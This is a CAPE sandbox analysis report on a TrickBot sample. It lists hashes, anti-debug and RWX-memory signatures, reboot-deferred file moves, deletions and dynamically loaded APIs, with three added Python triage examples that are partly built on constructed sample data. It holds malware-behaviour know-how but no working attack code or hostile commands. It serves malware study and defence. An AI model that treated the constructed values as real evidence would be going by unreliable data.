2019-08-13 23:41:59,098 [root] INFO: Process with pid 3868 has terminated
2019-08-13 23:41:59,098 [root] INFO: Process with pid 2756 has terminated
2019-08-13 23:44:48,450 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-08-13 23:44:48,450 [root] INFO: Created shutdown mutex.
2019-08-13 23:44:49,464 [root] INFO: Shutting down package.
2019-08-13 23:44:49,464 [root] INFO: Stopping auxiliary modules.
2019-08-13 23:44:49,464 [root] INFO: Finishing auxiliary modules.
2019-08-13 23:44:49,464 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-08-13 23:44:49,464 [root] WARNING: File at path "C:\bbTJiLOfj\debugger" does not exist, skip.
2019-08-13 23:44:49,480 [root] INFO: Analysis completed.
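
The analyzer log above interleaves several processes: the sample's children being dumped on NtTerminateProcess, CAPE attaching to services.exe (pid 460) after the "KeyIso" service start was announced, and lsass.exe (pid 2756) being injected while suspended. The following Python is an added example for this report (not CAPE code) that rebuilds a per-PID timeline from lines in that format: where the monitor loaded, the "Commandline:" logged right after it, each dump written under the CAPE directory (the file name starts with the PID), and termination. It also marks PIDs that the monitor announced and the loader then injected, so that system processes the sandbox instrumented to follow a service start are not mistaken for the sample's own process tree. The regexes are assumptions about the message formats visible above; the sample lines are a constructed subset in the same format.

```python
"""Reconstruct a per-process timeline from CAPE analyzer log lines.

Added example for this report, not part of CAPE itself. The regexes are
assumptions about the message formats visible in the log above; the sample
lines below are a constructed subset in that same format.
"""
import re
from collections import defaultdict

# Constructed sample, modelled on the analyzer log above.
SAMPLE_LOG = r"""
2019-08-13 23:41:24,762 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 3868 at 0x0000000074460000, image base 0x00000000FFA10000, stack from 0x00000000000A5000-0x00000000000B0000
2019-08-13 23:41:24,762 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe.
2019-08-13 23:41:24,778 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1988
2019-08-13 23:41:24,778 [root] INFO: Added new process to list with pid: 3868
2019-08-13 23:41:24,871 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\1988_26897976241214382019
2019-08-13 23:41:24,901 [root] INFO: Notified of termination of process with pid 1988.
2019-08-13 23:41:25,759 [root] INFO: Announced starting service "KeyIso"
2019-08-13 23:41:25,759 [root] INFO: Attaching to Service Control Manager (services.exe - pid 460)
2019-08-13 23:41:25,915 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 460 at 0x0000000074460000, image base 0x00000000FFA10000, stack from 0x0000000003226000-0x0000000003230000
2019-08-13 23:41:25,915 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2019-08-13 23:41:27,180 [root] INFO: Process with pid 1988 has terminated
2019-08-13 23:41:27,242 [root] INFO: Announced 64-bit process name: lsass.exe pid: 2756
2019-08-13 23:41:58,193 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\3868_337956475272214382019
2019-08-13 23:41:59,098 [root] INFO: Process with pid 3868 has terminated
2019-08-13 23:41:59,098 [root] INFO: Process with pid 2756 has terminated
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d,\d{3}) "
    r"\[(?P<logger>[^\]]+)\] (?P<level>[A-Z]+): (?P<msg>.*)$"
)

# Each pattern captures the PID the message is about; the first match wins.
EVENT_PATTERNS = [
    ("announced", re.compile(r"Announced 64-bit process name: (?P<image>\S+) pid: (?P<pid>\d+)")),
    ("announced", re.compile(r"Attaching to Service Control Manager \((?P<image>services\.exe) - pid (?P<pid>\d+)\)")),
    ("monitor_loaded", re.compile(r"CAPE initialised: .* loaded in process (?P<pid>\d+) ")),
    ("listed", re.compile(r"Added new process to list with pid: (?P<pid>\d+)")),
    ("dump_attempt", re.compile(r"Attempting to dump process (?P<pid>\d+)")),
    ("dump_file", re.compile(r"Added new CAPE file to list with path: (?P<path>.*[\\/](?P<pid>\d+)_\d+)$")),
    ("terminating", re.compile(r"Notified of termination of process with pid (?P<pid>\d+)")),
    ("terminated", re.compile(r"Process with pid (?P<pid>\d+) has terminated")),
]
# "Commandline:" lines carry no PID; the analyzer logs them right after the
# "CAPE initialised ... in process N" line, so we attribute them to that PID
# (assumption: this holds as long as two monitors do not initialise at once).
CMDLINE_RE = re.compile(r"^Commandline: (?P<cmd>.*?)\.?$")


def new_record():
    return {"image": None, "commandline": None, "announced_by_monitor": False,
            "dumps": [], "events": [], "terminated": False}


def parse_timeline(log_text):
    """Return {pid: record} with the ordered events seen for each PID."""
    procs = defaultdict(new_record)
    last_initialised = None
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # blank or non-log line
        ts, msg = m.group("ts"), m.group("msg")
        cm = CMDLINE_RE.match(msg)
        if cm:
            if last_initialised is not None:
                procs[last_initialised]["commandline"] = cm.group("cmd")
            continue
        for kind, pat in EVENT_PATTERNS:
            em = pat.search(msg)
            if not em:
                continue
            pid = int(em.group("pid"))
            rec = procs[pid]
            rec["events"].append((ts, kind))
            if kind == "announced":
                rec["announced_by_monitor"] = True
                rec["image"] = em.group("image")
            elif kind == "monitor_loaded":
                last_initialised = pid
            elif kind == "dump_file":
                rec["dumps"].append(em.group("path"))
            elif kind == "terminated":
                rec["terminated"] = True
            break
    return dict(procs)


def processes_with_dumps(procs):
    """PIDs for which CAPE wrote at least one dump (the files to run YARA over)."""
    return sorted(pid for pid, rec in procs.items() if rec["dumps"])


def announced_targets(procs):
    """PIDs the monitor announced for injection (service start / new process)."""
    return sorted(pid for pid, rec in procs.items() if rec["announced_by_monitor"])


if __name__ == "__main__":
    timeline = parse_timeline(SAMPLE_LOG)
    for pid in sorted(timeline):
        rec = timeline[pid]
        print(pid, rec["commandline"] or rec["image"], [k for _, k in rec["events"]], rec["dumps"])
```

Run it against the full analysis.log of a task and the dump list it produces is the set of files under CAPE/ worth feeding to YARA; the announced set tells you which of those belong to sandbox-instrumented system processes rather than to the sample.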

MalScore

10.0

TrickBot

Machine

Name target-01
Label target-01
Manager ESX
Started On 2019-08-13 22:41:12
Shutdown On 2019-08-13 22:45:04

File Details

File Name ade7ed347881c8a422484a7fa8be461b460a6f7204fa8498e29810f3ca67e829
File Size 675094 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 37c059b7484b539e0be9706d156f228c
SHA1 74d05c52681fea521bb2bb5a8d33ee10081eb0d8
SHA256 ade7ed347881c8a422484a7fa8be461b460a6f7204fa8498e29810f3ca67e829
SHA512 ed9ba25ccde8163a6c6de17f6ce907cde6ecf3112dd428093adddea55538a146fb7deb192722c4692c3eb0a9300e48212b86b708de3f682003707f6d567c6282
CRC32 42FD3886
Ssdeep 12288:gMu7KFpzOscDD85KBq6p26j4muXNS8FBsM0Nb:gMFnzOsMLhp26Um86M0Nb
TrID
  • 61.7% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 14.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 10.0% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 4.5% (.EXE) OS/2 Executable (generic) (2029/13)
  • 4.4% (.EXE) Generic Win/DOS Executable (2002/3)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Scheduled file move on reboot detected
File Move on Reboot: Old: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7K5UWNQAAA284NII014E.temp -> New: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
File Move on Reboot: Old: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5ZNGV2JSA4OCNZIV8RKJ.temp -> New: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
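A rename deferred to reboot (MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT, which is what this signature keys on) survives only as a registry entry: Windows appends the source and destination to the REG_MULTI_SZ value PendingFileRenameOperations under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager, an empty destination meaning "delete at boot". The decoder below is an added example for this report, not CAPE code. It assumes that format, that paths are stored in NT form (\??\C:\...), and that a leading "!" on the destination marks MOVEFILE_REPLACE_EXISTING; the sample value is constructed from the two renames listed above plus a made-up delete entry. It decodes the raw value bytes itself, because convenience APIs that split a REG_MULTI_SZ on NUL and stop at the first empty string silently drop every entry after a delete.

```python
"""Decode the PendingFileRenameOperations value a reboot-deferred move leaves behind.

Added example for this report (not CAPE code). Assumed format: REG_MULTI_SZ
holding source/destination string pairs in NT path form (\\??\\C:\\...), an
empty destination meaning "delete at boot", and a "!" prefix on the
destination meaning MOVEFILE_REPLACE_EXISTING.
"""

NT_PREFIX = "\\??\\"

# Constructed sample value: the two jump-list renames from the report plus a
# made-up delete entry, laid out as the flat pair list the registry uses.
SAMPLE_VALUE = [
    r"\??\C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7K5UWNQAAA284NII014E.temp",
    r"!\??\C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms",
    r"\??\C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5ZNGV2JSA4OCNZIV8RKJ.temp",
    r"!\??\C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms",
    r"\??\C:\Users\user\AppData\Local\Temp\stage.tmp",   # constructed source
    "",                                                   # empty destination = delete at boot
]


def encode_multi_sz(entries):
    """Build the raw REG_MULTI_SZ bytes: NUL-separated UTF-16LE strings, double-NUL terminated."""
    return ("\0".join(entries) + "\0\0").encode("utf-16-le")


def decode_multi_sz(raw):
    """Split raw REG_MULTI_SZ bytes, keeping the empty strings a naive NUL-split would lose."""
    text = raw.decode("utf-16-le")
    if text.endswith("\0\0"):
        text = text[:-2]      # last string's terminator + list terminator
    elif text.endswith("\0"):
        text = text[:-1]
    return text.split("\0") if text else []


def strip_nt_prefix(path):
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def parse_pending_renames(entries):
    """Turn the flat string list into move/delete operations."""
    if len(entries) % 2:
        raise ValueError("value must contain source/destination pairs")
    ops = []
    for src, dst in zip(entries[0::2], entries[1::2]):
        replace = dst.startswith("!")
        dst = dst[1:] if replace else dst
        ops.append({
            "action": "move" if dst else "delete",
            "source": strip_nt_prefix(src),
            "destination": strip_nt_prefix(dst) if dst else None,
            "replace_existing": replace,
        })
    return ops


def describe(ops):
    """One human-readable line per queued operation."""
    lines = []
    for op in ops:
        if op["action"] == "delete":
            lines.append(f"DELETE {op['source']}")
        else:
            flag = " (replace existing)" if op["replace_existing"] else ""
            lines.append(f"MOVE   {op['source']} -> {op['destination']}{flag}")
    return lines


if __name__ == "__main__":
    raw = encode_multi_sz(SAMPLE_VALUE)        # stands in for bytes read from the hive
    for line in describe(parse_pending_renames(decode_multi_sz(raw))):
        print(line)
```

On a live host, take the value bytes from the hive (or from RegQueryValueEx directly) rather than a wrapper that returns a string list, then pass them to decode_multi_sz. Queuing these entries needs write access to HKLM, so a sample that succeeds in doing so was running with administrative rights in the sandbox.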
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 3868 triggered the Yara rule 'TrickBot'
Hit: PID 2352 triggered the Yara rule 'shellcode'
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: exlxo5YyAuKqn.exe, PID 740
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e532.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2952.15001147
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2952.15001147
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2952.15001147
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e8ab.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.1628.15001881
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.1628.15001896
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.1628.15001896
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.624.15891007
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.624.15891007
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.624.15891007
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2056.15001974
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2056.15001974
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2056.15001974
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDMN0LR05DQCP1U000ZS.temp
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3004.15002941
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3004.15002941
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3004.15002941
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4ed4d.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.1964.15003051
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.1964.15003051
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.1964.15003066
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf28611.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.920.15894096
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.920.15894096
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.920.15894096
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f3f1.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3132.15004767
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3132.15004767
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3132.15004767
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f317.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3640.15004595
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3640.15004595
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3640.15004595
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf289c9.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3112.15895047
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3112.15895047
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3112.15895047
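Most of the paths behind the "10+" deletions above are files named security.config.cch.<n>.<m> or enterprisesec.config.cch.<n>.<m> under the .NET v2.0 CONFIG directory and the per-user CLR Security Config folder, plus jump-list temp files under Recent\CustomDestinations. The number after "cch." lines up with PIDs that terminate in the analyzer log (920, 3640, 3132 and 3112 all appear there), which is the quickest way to separate per-process runtime cleanup from deletions that deserve a look. The triage below is an added example for this report, not a CAPE signature; the suffix patterns are read off the paths above, the sample list is a constructed subset of that evidence plus one made-up path, and treating the number as a PID is an assumption the cross-reference is there to check.

```python
"""Triage the file-deletion evidence: separate per-process cache files from the rest.

Added example for this report, not a CAPE signature. The suffix pattern
`.config.cch.<pid>.<number>` is read off the paths above; that the number
after "cch." is a PID is an assumption checked by cross-referencing the
PIDs that terminate in the analyzer log.
"""
import re

# Constructed subset of the DeletedFile evidence above, plus one made-up path
# that fits neither pattern.
DELETED_FILES = [
    r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e532.TMP",
    r"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.920.15894096",
    r"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.920.15894096",
    r"C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.920.15894096",
    r"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3640.15004595",
    r"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2952.15001147",
    r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDMN0LR05DQCP1U000ZS.temp",
    r"C:\Users\user\AppData\Local\Temp\stage.tmp",  # constructed: not a cache or jump-list file
]

# PIDs reported as terminated in the analyzer log above (constructed subset).
TERMINATED_PIDS = {2352, 1356, 920, 3640, 1560, 668, 3132, 3112, 1988, 3488, 3000, 3868, 2756}

CLR_CACHE_RE = re.compile(r"\\(?:security|enterprisesec)\.config\.cch\.(?P<pid>\d+)\.(?P<seq>\d+)$", re.I)
JUMPLIST_RE = re.compile(r"\\Recent\\CustomDestinations\\[^\\]+$", re.I)


def triage_deletions(paths, known_pids):
    """Bucket deleted paths and report which cache-file PIDs match known processes."""
    buckets = {"clr_config_cache": [], "jumplist": [], "other": []}
    cache_pids = set()
    for path in paths:
        m = CLR_CACHE_RE.search(path)
        if m:
            buckets["clr_config_cache"].append(path)
            cache_pids.add(int(m.group("pid")))
        elif JUMPLIST_RE.search(path):
            buckets["jumplist"].append(path)
        else:
            buckets["other"].append(path)
    return {
        "buckets": buckets,
        "cache_pids_seen_in_log": sorted(cache_pids & set(known_pids)),
        "cache_pids_not_in_log": sorted(cache_pids - set(known_pids)),
    }


def deletions_worth_a_look(paths, known_pids):
    """Everything that is neither a per-PID cache file nor a jump-list temp file."""
    return triage_deletions(paths, known_pids)["buckets"]["other"]


if __name__ == "__main__":
    result = triage_deletions(DELETED_FILES, TERMINATED_PIDS)
    for name, items in result["buckets"].items():
        print(f"{name}: {len(items)}")
    print("cache PIDs matching the log:", result["cache_pids_seen_in_log"])
    print("cache PIDs not in this log excerpt:", result["cache_pids_not_in_log"])
    print("look at:", deletions_worth_a_look(DELETED_FILES, TERMINATED_PIDS))
```

A cache-file PID that never shows up in the log (2952 in the constructed subset) is not by itself suspicious; the log excerpt above starts mid-analysis, so check the full analysis.log before drawing a conclusion from it.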
Guard pages use detected - possible anti-debugging.
Dynamic (imported) function loading detected
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: comctl32.dll/
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptEncrypt
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTBASE.dll/SystemFunction040
DynamicLoader: CRYPTBASE.dll/SystemFunction041
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: comctl32.dll/
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/GetSecurityInfo
DynamicLoader: ADVAPI32.dll/SetSecurityInfo
DynamicLoader: ADVAPI32.dll/GetSecurityDescriptorControl
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
